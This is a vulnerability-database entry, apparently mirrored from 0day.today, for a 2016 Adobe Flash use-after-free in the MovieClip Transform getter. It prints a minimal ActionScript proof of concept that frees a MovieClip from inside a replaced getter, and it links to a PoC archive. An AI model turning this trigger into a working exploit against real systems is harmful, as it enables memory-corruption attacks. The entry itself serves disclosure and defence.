Lucene search
K

Adobe Flash - MovieClip Transform Getter Use-After-Free

🗓️ 29 Aug 2016 00:00:00Reported by Google Security ResearchType 
zdt
 zdt
🔗 0day.today👁 23 Views

Adobe Flash MovieClip Transform Getter Use-After-Free vulnerabilit

Related
Code
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=844
 
There is a use-after-free in the MovieClip Transform getter. If the Transform constructor is replaced with a getter using addProperty, this getter can free the MovieClip before it is accessed. A minimal PoC is as follows:
 
var mc = this.createEmptyMovieClip( "mc", 1);
var tf = flash.geom.Transform;
var g = flash.geom;
g.addProperty("Transform", func, func);
mc.f = ASnative(900, 419);
mc.f();
 
function func(){
     
    mc.removeMovieClip();
     
        // Fix heap
    }
 
 
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40311.zip

#  0day.today [2018-03-09]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Aug 2016 00:00Current
0.4Low risk
Vulners AI Score0.4
EPSS0.65385
23